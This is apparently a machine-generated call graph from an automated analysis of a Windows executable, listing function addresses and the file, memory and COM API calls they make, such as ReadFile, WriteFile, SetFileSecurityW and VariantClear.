73767->73815 73771 5c98fc __EH_prolog 73770->73771 73831 5c9987 73771->73831 73773 5c9970 73773->73708 73774 5c9911 73774->73773 73835 5cef8d 12 API calls 2 library calls 73774->73835 73875 5ef445 73776->73875 73881 5ecf91 73776->73881 73889 5e5505 73776->73889 73777 5ccc8b 73781 5ccccb 73777->73781 73893 5c979e VariantClear __EH_prolog 73777->73893 73779 5cccb1 73779->73781 73894 5ccae9 VariantClear 73779->73894 73781->73708 73785->73720 73786->73708 73787->73708 73788->73708 73789->73708 73790->73708 73791->73708 73792->73716 73793->73734 73794->73740 73795->73734 73796->73757 73797->73763 73798->73734 73799->73758 73800->73764 73801->73734 73802->73752 73803->73759 73804->73734 73805->73704 73806->73717 73807->73723 73808->73727 73809->73734 73810->73731 73811->73733 73812->73739 73813->73743 73814->73745 73816 5ab969 73815->73816 73817 5ab97d 73815->73817 73816->73817 73821 5a7731 73816->73821 73817->73708 73819 5ab9ee 73819->73817 73829 5ab8ec GetLastError 73819->73829 73822 5a775c SetFilePointer 73821->73822 73823 5a7740 73821->73823 73824 5a7780 GetLastError 73822->73824 73827 5a77a1 73822->73827 73823->73822 73825 5a778c 73824->73825 73824->73827 73830 5a76d6 SetFilePointer GetLastError 73825->73830 73827->73819 73828 5a7796 SetLastError 73828->73827 73829->73817 73830->73828 73832 5c9991 __EH_prolog 73831->73832 73836 5f80aa 73832->73836 73833 5c99a8 73833->73774 73835->73773 73837 5f80b4 __EH_prolog 73836->73837 73838 5a1e0c ctype 2 API calls 73837->73838 73839 5f80bf 73838->73839 73840 5f80d3 73839->73840 73842 5ebdb5 73839->73842 73840->73833 73843 5ebdbf __EH_prolog 73842->73843 73848 5ebe69 73843->73848 73845 5ebdef 73846 5a2e04 2 API calls 73845->73846 73847 5ebe16 73846->73847 73847->73840 73849 5ebe73 __EH_prolog 73848->73849 73852 5e5e2b 73849->73852 73851 5ebe7f 73851->73845 73853 5e5e35 __EH_prolog 73852->73853 73858 5e08b6 73853->73858 73855 5e5e41 73863 5bdfc9 malloc _CxxThrowException __EH_prolog 73855->73863 73857 5e5e57 73857->73851 73864 5a9c60 73858->73864 73860 5e08c4 73869 5a9c8f GetModuleHandleA GetProcAddress 73860->73869 73862 5e08f3 __aulldiv 73862->73855 73863->73857 73874 5a9c4d GetCurrentProcess GetProcessAffinityMask 73864->73874 73866 5a9c6e 73867 5a9c80 GetSystemInfo 73866->73867 73868 5a9c79 73866->73868 73867->73860 73868->73860 73870 5a9cef GlobalMemoryStatus 73869->73870 73871 5a9cc4 GlobalMemoryStatusEx 73869->73871 73872 5a9d08 73870->73872 73871->73870 73873 5a9cce 73871->73873 73872->73873 73873->73862 73874->73866 73876 5ef455 73875->73876 73895 5b1092 73876->73895 73879 5ef478 73879->73777 73882 5ecf9b __EH_prolog 73881->73882 73883 5ef445 14 API calls 73882->73883 73884 5ed018 73883->73884 73888 5ed01f 73884->73888 73947 5f1511 73884->73947 73886 5ed08b 73886->73888 73953 5f2c5d 11 API calls 2 library calls 73886->73953 73888->73777 73890 5e550f __EH_prolog 73889->73890 74307 5e4e8a 73890->74307 73893->73779 73894->73781 73897 5ab95a 6 API calls 73895->73897 73896 5b10aa 73896->73879 73898 5ef1b2 73896->73898 73897->73896 73899 5ef1bc __EH_prolog 73898->73899 73908 5b1168 73899->73908 73901 5ef1e6 73901->73879 73902 5ef1d3 73902->73901 73903 5ef21c _CxxThrowException 73902->73903 73904 5ef231 memcpy 73902->73904 73903->73904 73907 5ef24c 73904->73907 73905 5ef2f0 memmove 73905->73907 73906 5ef31a memcpy 73906->73901 73907->73901 73907->73905 73907->73906 73911 5b111c 73908->73911 73913 5b1130 73911->73913 73912 5b115f 73912->73902 73913->73912 73916 5ad331 73913->73916 73920 5ab668 73913->73920 73917 5ad355 73916->73917 73918 5ad374 73917->73918 73919 5ab668 10 API calls 73917->73919 73918->73913 73919->73918 73921 5ab675 73920->73921 73925 5ab6aa 73921->73925 73926 5ab81b 73921->73926 73927 5ab7e7 73921->73927 73928 5a7731 5 API calls 73921->73928 73930 5ab7ad 73921->73930 73931 5ab811 73921->73931 73937 5ab864 73921->73937 73944 5a7b4f ReadFile 73921->73944 73924 5ab8aa GetLastError 73924->73925 73925->73913 73926->73925 73929 5ab839 memcpy 73926->73929 73932 5a7731 5 API calls 73927->73932 73927->73937 73928->73921 73929->73925 73930->73921 73938 5ab8c7 73930->73938 73943 626a20 VirtualAlloc 73930->73943 73945 5ab8ec GetLastError 73931->73945 73933 5ab80d 73932->73933 73933->73931 73933->73937 73939 5a7b7c 73937->73939 73938->73925 73940 5a7b89 73939->73940 73946 5a7b4f ReadFile 73940->73946 73942 5a7b9a 73942->73924 73942->73925 73943->73930 73944->73921 73945->73925 73946->73942 73948 5f151b __EH_prolog 73947->73948 73954 5f10d3 73948->73954 73951 5f1589 73951->73886 73952 5f1552 _CxxThrowException 73952->73886 73953->73888 73955 5f10dd __EH_prolog 73954->73955 73986 5ed1b7 73955->73986 73958 5f12ef 73958->73951 73958->73952 73959 5f139e 73959->73958 73960 5f13c4 73959->73960 73961 5a1e0c ctype 2 API calls 73959->73961 73962 5b1168 10 API calls 73960->73962 73961->73960 73965 5f13da 73962->73965 73963 5b1168 10 API calls 73967 5f11f4 73963->73967 73968 5f13f9 73965->73968 73978 5f13de 73965->73978 74028 5eef67 _CxxThrowException 73965->74028 73967->73958 73985 5ab95a 6 API calls 73967->73985 73993 5ef047 73968->73993 73971 5f14ba 74032 5f0943 50 API calls 2 library calls 73971->74032 73972 5f1450 73997 5f06ae 73972->73997 73975 5f14e7 74033 5d2db9 free ctype 73975->74033 74034 5a1e40 free 73978->74034 73985->73959 74035 5ed23c 73986->74035 73988 5ed1ed 74042 5a1e40 free 73988->74042 73990 5ed209 74043 5a1e40 free 73990->74043 73992 5ed21c 73992->73958 73992->73963 73992->73967 73994 5ef063 73993->73994 73995 5ef072 73994->73995 74071 5eef67 _CxxThrowException 73994->74071 73995->73971 73995->73972 74029 5eef67 _CxxThrowException 73995->74029 73998 5f06b8 __EH_prolog 73997->73998 74072 5f03f4 73998->74072 74000 5f0877 74199 5eb8dc 74000->74199 74004 5f08e3 _CxxThrowException 74006 5f08f7 74004->74006 74010 5eb8dc ctype free 74006->74010 74014 5a1e0c ctype 2 API calls 74026 5f0715 74014->74026 74026->74000 74026->74004 74026->74006 74026->74014 74027 5eef67 _CxxThrowException 74026->74027 74102 5b12a5 74026->74102 74107 5a429a 74026->74107 74113 5e81ec 74026->74113 74027->74026 74028->73968 74029->73972 74032->73975 74033->73978 74034->73958 74044 5ed2b8 74035->74044 74038 5ed25e 74061 5a1e40 free 74038->74061 74041 5ed275 74041->73988 74042->73990 74043->73992 74063 5a1e40 free 74044->74063 74046 5ed2c8 74064 5a1e40 free 74046->74064 74048 5ed2dc 74065 5a1e40 free 74048->74065 74050 5ed2e7 74066 5a1e40 free 74050->74066 74052 5ed2f2 74067 5a1e40 free 74052->74067 74054 5ed2fd 74068 5a1e40 free 74054->74068 74056 5ed308 74069 5a1e40 free 74056->74069 74058 5ed313 74060 5ed246 74058->74060 74070 5a1e40 free 74058->74070 74060->74038 74062 5a1e40 free 74060->74062 74061->74041 74062->74038 74063->74046 74064->74048 74065->74050 74066->74052 74067->74054 74068->74056 74069->74058 74070->74060 74071->73995 74073 5ef047 _CxxThrowException 74072->74073 74074 5f0407 74073->74074 74075 5f0475 74074->74075 74077 5ef047 _CxxThrowException 74074->74077 74076 5f049a 74075->74076 74216 5efa3f 22 API calls 2 library calls 74075->74216 74078 5f04b8 74076->74078 74217 5f159a malloc _CxxThrowException free ctype 74076->74217 74080 5f0421 74077->74080 74079 5f04e8 74078->74079 74083 5f04cd 74078->74083 74219 5f7c4a malloc _CxxThrowException free ctype 74079->74219 74084 5f043e 74080->74084 74213 5eef67 _CxxThrowException 74080->74213 74218 5efff0 9 API calls 2 library calls 74083->74218 74214 5ef93c 7 API calls 2 library calls 74084->74214 74086 5f0492 74089 5ef047 _CxxThrowException 74086->74089 74088 5f04f3 74093 5f04e3 74088->74093 74220 5b089e malloc _CxxThrowException free _CxxThrowException memcpy 74088->74220 74089->74076 74091 5f04db 74095 5ef047 _CxxThrowException 74091->74095 74097 5f054a 74093->74097 74221 5eef67 _CxxThrowException 74093->74221 74094 5f0446 74096 5f046d 74094->74096 74215 5eef67 _CxxThrowException 74094->74215 74095->74093 74098 5ef047 _CxxThrowException 74096->74098 74097->74026 74098->74075 74103 5e04d2 5 API calls 74102->74103 74108 5a42a7 74107->74108 74112 5a42c5 74107->74112 74112->74026 74114 5e81f6 __EH_prolog 74113->74114 74213->74084 74214->74094 74215->74096 74216->74086 74217->74078 74218->74091 74219->74088 74220->74088 74221->74097 74308 5e4e94 __EH_prolog 74307->74308 74309 5a2e04 2 API calls 74308->74309 74325 5e4f1d 74308->74325 74310 5e4ed7 74309->74310 74439 5b7fc5 74310->74439 74312 5e4f0a 74460 5a965d 74312->74460 74313 5e4f37 74314 5e4f63 74313->74314 74315 5e4f41 74313->74315 74318 5a2f88 3 API calls 74314->74318 74317 5a965d VariantClear 74315->74317 74320 5e4f4c 74317->74320 74321 5e4f71 74318->74321 74465 5a1e40 free 74320->74465 74324 5a965d VariantClear 74321->74324 74326 5e4f80 74324->74326 74325->73777 74466 5b5bcf malloc _CxxThrowException 74326->74466 74328 5e4f9a 74329 5a2e47 2 API calls 74328->74329 74330 5e4fad 74329->74330 74331 5a2f1c 2 API calls 74330->74331 74332 5e4fbd 74331->74332 74333 5a2e04 2 API calls 74332->74333 74334 5e4fd1 74333->74334 74335 5a2e04 2 API calls 74334->74335 74344 5e4fdd 74335->74344 74336 5e5404 74511 5a1e40 free 74336->74511 74338 5e540c 74512 5a1e40 free 74338->74512 74340 5e5414 74513 5a1e40 free 74340->74513 74343 5e5099 74346 5a2da9 2 API calls 74343->74346 74344->74336 74467 5b5bcf malloc _CxxThrowException 74344->74467 74345 5e541c 74514 5a1e40 free 74345->74514 74348 5e50a9 74346->74348 74350 5a2fec 3 API calls 74348->74350 74349 5e5424 74515 5a1e40 free 74349->74515 74352 5e50b6 74350->74352 74468 5a1e40 free 74352->74468 74353 5e542c 74516 5a1e40 free 74353->74516 74356 5e50be 74469 5a1e40 free 74356->74469 74358 5e50cd 74359 5a2f88 3 API calls 74358->74359 74360 5e50e3 74359->74360 74361 5e5100 74360->74361 74362 5e50f1 74360->74362 74476 5a3044 malloc _CxxThrowException free ctype 74361->74476 74470 5a30ea 74362->74470 74365 5e50fe 74477 5b1029 6 API calls 74365->74477 74367 5e511a 74368 5e516b 74367->74368 74369 5e5120 74367->74369 74484 5b089e malloc _CxxThrowException free _CxxThrowException memcpy 74368->74484 74478 5a1e40 free 74369->74478 74372 5e5187 74376 5e04d2 5 API calls 74372->74376 74373 5e5128 74479 5a1e40 free 74373->74479 74375 5e5130 74480 5a1e40 free 74375->74480 74378 5e51ba 74376->74378 74485 5e0516 malloc _CxxThrowException ctype 74378->74485 74379 5e5138 74481 5a1e40 free 74379->74481 74382 5e51c5 74386 5e522d 74382->74386 74387 5e51f5 74382->74387 74383 5e5140 74482 5a1e40 free 74383->74482 74385 5e5148 74483 5a1e40 free 74385->74483 74389 5a2e04 2 API calls 74386->74389 74486 5a1e40 free 74387->74486 74436 5e5235 74389->74436 74391 5e51fd 74487 5a1e40 free 74391->74487 74394 5e5205 74488 5a1e40 free 74394->74488 74395 5e532e 74497 5a1e40 free 74395->74497 74398 5e520d 74399 5e5347 74399->74336 74401 5e5358 74399->74401 74498 5a1e40 free 74401->74498 74404 5e53a3 74504 5a1e40 free 74404->74504 74414 5e53bc 74505 5a1e40 free 74414->74505 74422 5e04d2 5 API calls 74422->74436 74436->74395 74436->74404 74436->74422 74437 5a2e04 2 API calls 74436->74437 74492 5e545c 5 API calls 2 library calls 74436->74492 74493 5b1029 6 API calls 74436->74493 74494 5b089e malloc _CxxThrowException free _CxxThrowException memcpy 74436->74494 74495 5e0516 malloc _CxxThrowException ctype 74436->74495 74496 5a1e40 free 74436->74496 74437->74436 74443 5b7fcf __EH_prolog 74439->74443 74440 5b7ff4 74441 5b800a 74440->74441 74517 5a950d 74440->74517 74526 5a9736 VariantClear 74441->74526 74442 5b8061 74445 5b805c 74442->74445 74457 5b8025 74442->74457 74443->74440 74443->74442 74443->74445 74446 5b8019 74443->74446 74525 5a9630 VariantClear 74445->74525 74446->74440 74449 5b801e 74446->74449 74447 5b80b8 74451 5a965d VariantClear 74447->74451 74452 5b8042 74449->74452 74453 5b8022 74449->74453 74455 5b80c0 74451->74455 74523 5a9597 VariantClear 74452->74523 74456 5b8032 74453->74456 74453->74457 74455->74312 74455->74313 74522 5a9604 VariantClear 74456->74522 74457->74441 74524 5a95df VariantClear 74457->74524 74461 5a9685 74460->74461 74463 5a9665 74460->74463 74464 5a1e40 free 74461->74464 74462 5a967e VariantClear 74462->74461 74463->74461 74463->74462 74464->74325 74465->74325 74466->74328 74467->74343 74468->74356 74469->74358 74471 5a30fd 74470->74471 74471->74471 74472 5a1e0c ctype 2 API calls 74471->74472 74474 5a311d 74471->74474 74473 5a3113 74472->74473 74533 5a1e40 free 74473->74533 74474->74365 74476->74365 74477->74367 74478->74373 74479->74375 74480->74379 74481->74383 74482->74385 74483->74325 74484->74372 74485->74382 74486->74391 74487->74394 74488->74398 74492->74436 74493->74436 74494->74436 74495->74436 74496->74436 74497->74399 74504->74414 74511->74338 74512->74340 74513->74345 74514->74349 74515->74353 74516->74325 74527 5a9767 74517->74527 74519 5a9518 SysAllocStringLen 74520 5a9539 _CxxThrowException 74519->74520 74521 5a954f 74519->74521 74520->74521 74521->74441 74522->74441 74523->74441 74524->74441 74525->74441 74526->74447 74528 5a9779 74527->74528 74529 5a9770 74527->74529 74532 5a9686 VariantClear 74528->74532 74529->74519 74531 5a9780 74531->74519 74532->74531 74533->74474 74534 5e0343 74539 5e035f 74534->74539 74538 5e0358 74540 5e0369 __EH_prolog 74539->74540 74556 5b139e 74540->74556 74545 5e0143 ctype free 74546 5e039a 74545->74546 74566 5a1e40 free 74546->74566 74548 5e03a2 74567 5a1e40 free 74548->74567 74550 5e03aa 74568 5e03d8 74550->74568 74555 5a1e40 free 74555->74538 74557 5b13ae 74556->74557 74558 5b13b3 74556->74558 74584 637ea0 SetEvent GetLastError 74557->74584 74560 5e01c4 74558->74560 74562 5e01ce __EH_prolog 74560->74562 74564 5e0203 74562->74564 74586 5a1e40 free 74562->74586 74563 5e020b 74563->74545 74585 5a1e40 free 74564->74585 74566->74548 74567->74550 74569 5e03e2 __EH_prolog 74568->74569 74570 5b139e ctype 2 API calls 74569->74570 74571 5e03fb 74570->74571 74587 637d50 74571->74587 74573 5e0403 74574 637d50 ctype 2 API calls 74573->74574 74575 5e040b 74574->74575 74576 637d50 ctype 2 API calls 74575->74576 74577 5e03b7 74576->74577 74578 5e004a 74577->74578 74579 5e0054 __EH_prolog 74578->74579 74593 5a1e40 free 74579->74593 74581 5e0067 74594 5a1e40 free 74581->74594 74583 5e006f 74583->74538 74583->74555 74584->74558 74585->74563 74586->74562 74588 637d7b 74587->74588 74589 637d59 CloseHandle 74587->74589 74588->74573 74590 637d75 74589->74590 74591 637d64 GetLastError 74589->74591 74590->74588 74591->74588 74592 637d6e 74591->74592 74592->74573 74593->74581 74594->74583 74595 5ab144 74596 5ab153 74595->74596 74598 5ab159 74595->74598 74599 5b11b4 74596->74599 74600 5b11c1 74599->74600 74601 5b11eb 74600->74601 74604 5eaf27 74600->74604 74611 5eae7c 74600->74611 74601->74598 74607 5eaf36 74604->74607 74605 5eb010 74605->74600 74607->74605 74609 5eaeeb 107 API calls 74607->74609 74616 5abd0c 74607->74616 74621 5ead3a 74607->74621 74625 5eaebf 107 API calls 74607->74625 74609->74607 74612 5eae86 74611->74612 74614 5b7140 7 API calls 74612->74614 75138 5b7190 74612->75138 74613 5eaebb 74613->74600 74614->74613 74626 5a7ca2 74616->74626 74619 5abd3d 74619->74607 74622 5ead44 __EH_prolog 74621->74622 74634 5b6305 74622->74634 74623 5eadbf 74623->74607 74625->74607 74629 5a7caf 74626->74629 74628 5a7cdb 74628->74619 74630 5ab8ec GetLastError 74628->74630 74629->74628 74631 5a7c68 74629->74631 74630->74619 74632 5a7c79 WriteFile 74631->74632 74633 5a7c76 74631->74633 74632->74629 74633->74632 74635 5b630f __EH_prolog 74634->74635 74671 5b62b9 74635->74671 74638 5b6427 74640 5a965d VariantClear 74638->74640 74639 5b644a 74641 5a965d VariantClear 74639->74641 74660 5b6445 74640->74660 74642 5b646b 74641->74642 74675 5b5126 74642->74675 74650 5b65de 74651 5b669e 74650->74651 74652 5b65e7 74650->74652 74657 5b66b8 74651->74657 74658 5b6754 74651->74658 74651->74660 74655 5a1e0c ctype 2 API calls 74652->74655 74659 5b65f6 74652->74659 74653 5b64da 74653->74650 74653->74660 74836 5b789c free memmove ctype 74653->74836 74655->74659 74661 5a1e0c ctype 2 API calls 74657->74661 74724 5b5bea 74658->74724 74837 5c36ea 74659->74837 74660->74623 74661->74660 74663 5b64ca 74663->74653 74663->74660 74835 5a42e3 CharUpperW 74663->74835 74664 5b665c 74849 5a31e5 malloc _CxxThrowException free _CxxThrowException 74664->74849 74667 5b666b 74850 5a1e40 free 74667->74850 74672 5b62c9 74671->74672 74851 5c8fa4 74672->74851 74676 5b5130 __EH_prolog 74675->74676 74677 5b51b4 74676->74677 74683 5b518e 74676->74683 74895 5a3097 malloc _CxxThrowException free SysStringLen ctype 74676->74895 74679 5a965d VariantClear 74677->74679 74677->74683 74681 5b51bc 74679->74681 74680 5a965d VariantClear 74682 5b527f 74680->74682 74681->74683 74684 5b5289 74681->74684 74685 5b5206 74681->74685 74682->74660 74717 5c8b05 74682->74717 74683->74680 74684->74683 74686 5b5221 74684->74686 74896 5a3097 malloc _CxxThrowException free SysStringLen ctype 74685->74896 74688 5a965d VariantClear 74686->74688 74689 5b522d 74688->74689 74689->74682 74690 5b5351 74689->74690 74897 5b5459 malloc _CxxThrowException __EH_prolog 74689->74897 74690->74682 74695 5b53a1 74690->74695 74902 5a35e7 memmove 74690->74902 74693 5b52ba 74898 5a8011 5 API calls ctype 74693->74898 74695->74682 74903 5a43b7 5 API calls 2 library calls 74695->74903 74696 5b52cf 74708 5b52fd 74696->74708 74899 5a823d 10 API calls 2 library calls 74696->74899 74700 5b52e5 74701 5a2fec 3 API calls 74700->74701 74703 5b52f5 74701->74703 74702 5b540e 74905 5b789c free memmove ctype 74702->74905 74900 5a1e40 free 74703->74900 74707 5b53df 74707->74702 74709 5b541c 74707->74709 74904 5a42e3 CharUpperW 74707->74904 74901 5b54a0 free ctype 74708->74901 74710 5c36ea 5 API calls 74709->74710 74711 5b5427 74710->74711 74712 5a2fec 3 API calls 74711->74712 74713 5b5433 74712->74713 74906 5a1e40 free 74713->74906 74715 5b543b 74907 5d2db9 free ctype 74715->74907 74718 5c8b2e 74717->74718 74719 5a965d VariantClear 74718->74719 74720 5b648a 74719->74720 74720->74660 74721 5b4d78 74720->74721 74908 5c9262 74721->74908 74725 5b5bf4 __EH_prolog 74724->74725 74915 5b54c0 74725->74915 74728 5b5e17 74728->74660 74729 5c8b05 VariantClear 74730 5b5c34 74729->74730 74730->74728 74930 5b5630 74730->74930 74733 5c36ea 5 API calls 74734 5b5c51 74733->74734 74735 5b5c60 74734->74735 75035 5b57c1 53 API calls 2 library calls 74734->75035 74737 5a2f1c 2 API calls 74735->74737 74738 5b5c6c 74737->74738 74741 5b5caa 74738->74741 75036 5b6217 4 API calls 2 library calls 74738->75036 74740 5b5c91 74742 5a2fec 3 API calls 74740->74742 74743 5b5d49 74741->74743 74748 5a2e04 2 API calls 74741->74748 74744 5b5c9e 74742->74744 74745 5b5d91 74743->74745 74746 5b5d55 74743->74746 74753 5b5da6 74745->74753 74951 5b58be 74745->74951 74749 5a2fec 3 API calls 74746->74749 74750 5b5cd2 74748->74750 75038 5a1e40 free 74750->75038 74834 5b5110 9 API calls 74834->74663 74835->74663 74836->74650 74838 5c36f4 __EH_prolog 74837->74838 74839 5a2e04 2 API calls 74838->74839 74845 5c370a 74839->74845 74840 5c3736 74841 5a2f1c 2 API calls 74840->74841 74844 5c3742 74841->74844 75135 5a1e40 free 74844->75135 74845->74840 75136 5a1089 malloc _CxxThrowException free _CxxThrowException 74845->75136 75137 5a31e5 malloc _CxxThrowException free _CxxThrowException 74845->75137 74847 5b6633 74847->74664 74847->74667 74848 5a1089 malloc _CxxThrowException free _CxxThrowException 74847->74848 74848->74664 74849->74667 74850->74660 74852 5c8fae __EH_prolog 74851->74852 74853 5c7ebb free 74852->74853 74854 5c8ff2 74853->74854 74885 5c8b64 74854->74885 74857 5b6302 74857->74638 74857->74639 74857->74660 74859 5c9020 74859->74857 74860 5a2fec 3 API calls 74859->74860 74861 5c903a 74860->74861 74874 5c904d 74861->74874 74889 5c8b80 VariantClear 74861->74889 74863 5c9244 74894 5a43b7 5 API calls 2 library calls 74863->74894 74864 5c91b0 74892 5c8b9c 10 API calls 2 library calls 74864->74892 74865 5c9144 74868 5a2f88 3 API calls 74865->74868 74872 5c917b 74865->74872 74868->74872 74869 5c91c0 74869->74857 74877 5a2f88 3 API calls 74869->74877 74870 5c9100 74873 5a965d VariantClear 74870->74873 74871 5c90d6 74871->74870 74876 5c90e7 74871->74876 74891 5c8f2e 9 API calls 74871->74891 74872->74863 74872->74864 74873->74857 74874->74857 74874->74865 74874->74870 74874->74871 74890 5a3097 malloc _CxxThrowException free SysStringLen ctype 74874->74890 74880 5a965d VariantClear 74876->74880 74883 5c91ff 74877->74883 74879 5c9112 74879->74870 74881 5c8b64 VariantClear 74879->74881 74880->74865 74882 5c9123 74881->74882 74882->74870 74882->74876 74883->74857 74893 5a50ff free ctype 74883->74893 74886 5c8b05 VariantClear 74885->74886 74887 5c8b6f 74886->74887 74887->74857 74888 5c8f2e 9 API calls 74887->74888 74888->74859 74889->74874 74890->74871 74891->74879 74892->74869 74893->74857 74894->74857 74895->74677 74896->74686 74897->74693 74898->74696 74899->74700 74900->74708 74901->74690 74902->74690 74903->74707 74904->74707 74905->74709 74906->74715 74907->74682 74909 5c926c __EH_prolog 74908->74909 74910 5c92a4 74909->74910 74911 5c92fc 74909->74911 74912 5a965d VariantClear 74910->74912 74913 5a965d VariantClear 74911->74913 74914 5b4d91 74912->74914 74913->74914 74914->74660 74914->74663 74914->74834 74916 5b54ca __EH_prolog 74915->74916 74917 5a965d VariantClear 74916->74917 74920 5b5507 74916->74920 74921 5b5528 74917->74921 74918 5a965d VariantClear 74919 5b5567 74918->74919 74919->74728 74919->74729 74920->74918 74921->74920 74922 5b5572 74921->74922 74923 5a965d VariantClear 74922->74923 74924 5b558e 74923->74924 75064 5b4cac VariantClear __EH_prolog 74924->75064 74926 5b55a1 74926->74919 75065 5b4cac VariantClear __EH_prolog 74926->75065 74928 5b55b8 74928->74919 75066 5b4cac VariantClear __EH_prolog 74928->75066 74931 5b563a __EH_prolog 74930->74931 74933 5b5679 74931->74933 75067 5c3558 10 API calls 2 library calls 74931->75067 74934 5a2f1c 2 API calls 74933->74934 74950 5b571a 74933->74950 74935 5b5696 74934->74935 75068 5c3333 malloc _CxxThrowException free 74935->75068 74937 5b56a2 74938 5b56ad 74937->74938 74939 5b56c5 74937->74939 75069 5b7853 5 API calls 2 library calls 74938->75069 74941 5b56b4 74939->74941 75070 5a4adf wcscmp 74939->75070 74943 5b5707 74941->74943 75072 5a1089 malloc _CxxThrowException free _CxxThrowException 74941->75072 75073 5a31e5 malloc _CxxThrowException free _CxxThrowException 74943->75073 74944 5b56d2 74944->74941 75071 5b7853 5 API calls 2 library calls 74944->75071 74947 5b5712 75074 5a1e40 free 74947->75074 74950->74733 75035->74735 75036->74740 75064->74926 75065->74928 75066->74919 75067->74933 75068->74937 75069->74941 75070->74944 75071->74941 75072->74943 75073->74947 75074->74950 75135->74847 75136->74845 75137->74845 75139 5b719a __EH_prolog 75138->75139 75140 5b71b0 75139->75140 75144 5b71dd 75139->75144 75141 5b4d78 VariantClear 75140->75141 75143 5b71b7 75141->75143 75143->74613 75151 5b6fc5 75144->75151 75145 5b72b4 75146 5b4d78 VariantClear 75145->75146 75147 5b72c0 75145->75147 75146->75147 75147->75143 75148 5b7140 7 API calls 75147->75148 75148->75143 75149 5b72a3 SetFileSecurityW 75149->75145 75150 5b7236 75150->75143 75150->75145 75150->75149 75152 5b6fcf __EH_prolog 75151->75152 75177 5b44a6 75152->75177 75158 5b709e 75204 5a1e40 free 75158->75204 75159 5b7051 75164 5b11b4 107 API calls 75159->75164 75167 5b706a 75159->75167 75160 5b7029 75160->75167 75199 5b4dff 7 API calls 2 library calls 75160->75199 75163 5b70c0 75200 5a6096 15 API calls 2 library calls 75163->75200 75164->75167 75165 5b712e 75165->75150 75180 5b68ac 75167->75180 75168 5b70e2 75174 5b70e6 75168->75174 75202 5b6b5e 69 API calls 2 library calls 75168->75202 75169 5b70d1 75169->75168 75201 5b4dff 7 API calls 2 library calls 75169->75201 75172 5b70fd 75173 5b7103 75172->75173 75172->75174 75203 5a1e40 free 75173->75203 75174->75158 75176 5b710b 75176->75165 75178 5a2e04 2 API calls 75177->75178 75179 5b44be 75178->75179 75179->75160 75179->75167 75198 5b6e71 12 API calls 2 library calls 75179->75198 75181 5b68b6 __EH_prolog 75180->75181 75182 5a7d4b 6 API calls 75181->75182 75183 5b6921 75181->75183 75196 5b68c5 75181->75196 75185 5b6906 75182->75185 75184 5b6962 75183->75184 75186 5b6998 75183->75186 75207 5b6a17 6 API calls 2 library calls 75183->75207 75184->75186 75208 5a2dcd malloc _CxxThrowException 75184->75208 75185->75183 75206 5b4dff 7 API calls 2 library calls 75185->75206 75187 5b69e1 75186->75187 75205 5a7c3b SetFileTime 75186->75205 75211 5abcf8 CloseHandle 75187->75211 75192 5b697a 75209 5b6b09 13 API calls __EH_prolog 75192->75209 75195 5b698c 75210 5a1e40 free 75195->75210 75196->75158 75196->75163 75198->75160 75199->75159 75200->75169 75201->75168 75202->75172 75203->75176 75204->75165 75205->75187 75206->75183 75207->75184 75208->75192 75209->75195 75210->75186 75211->75196 75212 5cd3c2 75213 5cd3e9 75212->75213 75214 5a965d VariantClear 75213->75214 75215 5cd42a 75214->75215 75216 5cd883 2 API calls 75215->75216 75217 5cd4b1 75216->75217 75303 5c8d4a 75217->75303 75220 5c8b05 VariantClear 75223 5cd4e3 75220->75223 75320 5c2a72 75223->75320 75224 5a2fec 3 API calls 75225 5cd594 75224->75225 75226 5cd5cd 75225->75226 75227 5cd742 75225->75227 75229 5cd7d9 75226->75229 75324 5c9317 75226->75324 75351 5ccd49 malloc _CxxThrowException free 75227->75351 75354 5a1e40 free 75229->75354 75230 5cd754 75234 5a2fec 3 API calls 75230->75234 75237 5cd763 75234->75237 75235 5cd7e1 75355 5a1e40 free 75235->75355 75236 5cd5f1 75239 5e04d2 5 API calls 75236->75239 75352 5a1e40 free 75237->75352 75242 5cd5f9 75239->75242 75241 5cd7e9 75244 5c326b free 75241->75244 75330 5ce332 75242->75330 75243 5cd76b 75353 5a1e40 free 75243->75353 75254 5cd69a 75244->75254 75248 5cd773 75250 5c326b free 75248->75250 75250->75254 75251 5cd610 75337 5a1e40 free 75251->75337 75253 5cd618 75338 5c326b 75253->75338 75256 5cd2a8 75256->75254 75278 5cd883 75256->75278 75279 5cd88d __EH_prolog 75278->75279 75280 5a2e04 2 API calls 75279->75280 75281 5cd8c6 75280->75281 75282 5a2e04 2 API calls 75281->75282 75283 5cd8d2 75282->75283 75284 5a2e04 2 API calls 75283->75284 75285 5cd8de 75284->75285 75356 5c2b63 75285->75356 75308 5c8d54 __EH_prolog 75303->75308 75304 5c8e09 75306 5a965d VariantClear 75304->75306 75305 5c8e15 75307 5c8e2d 75305->75307 75310 5c8e5e 75305->75310 75311 5c8e21 75305->75311 75309 5c8e11 75306->75309 75307->75310 75312 5c8e2b 75307->75312 75318 5c8da4 75308->75318 75364 5a2b55 malloc _CxxThrowException free _CxxThrowException ctype 75308->75364 75309->75220 75313 5a965d VariantClear 75310->75313 75365 5a3097 malloc _CxxThrowException free SysStringLen ctype 75311->75365 75316 5a965d VariantClear 75312->75316 75313->75309 75317 5c8e47 75316->75317 75317->75309 75366 5c8e7c 6 API calls __EH_prolog 75317->75366 75318->75304 75318->75305 75318->75309 75321 5c2a82 75320->75321 75322 5a2e04 2 API calls 75321->75322 75323 5c2a9f 75322->75323 75323->75224 75327 5c9321 __EH_prolog 75324->75327 75325 5a965d VariantClear 75326 5c93d0 75325->75326 75326->75229 75326->75236 75329 5c9360 75327->75329 75367 5a9686 VariantClear 75327->75367 75329->75325 75331 5ce33c __EH_prolog 75330->75331 75332 5a1e0c ctype 2 API calls 75331->75332 75333 5ce34a 75332->75333 75334 5cd608 75333->75334 75368 5ce3d1 malloc _CxxThrowException __EH_prolog 75333->75368 75336 5a1e40 free 75334->75336 75336->75251 75337->75253 75339 5c3275 __EH_prolog 75338->75339 75369 5c2c0b 75339->75369 75342 5c2c0b ctype free 75343 5c3296 75342->75343 75374 5a1e40 free 75343->75374 75345 5c329e 75375 5a1e40 free 75345->75375 75347 5c32a6 75376 5a1e40 free 75347->75376 75349 5c32ae 75349->75256 75351->75230 75352->75243 75353->75248 75354->75235 75355->75241 75357 5c2b6d __EH_prolog 75356->75357 75358 5a2e04 2 API calls 75357->75358 75359 5c2b9a 75358->75359 75360 5a2e04 2 API calls 75359->75360 75364->75318 75365->75312 75366->75309 75367->75329 75368->75334 75377 5a1e40 free 75369->75377 75371 5c2c16 75378 5a1e40 free 75371->75378 75373 5c2c1e 75373->75342 75374->75345 75375->75347 75376->75349 75377->75371 75378->75373 75379 5d993d 75463 5db5b1 75379->75463 75382 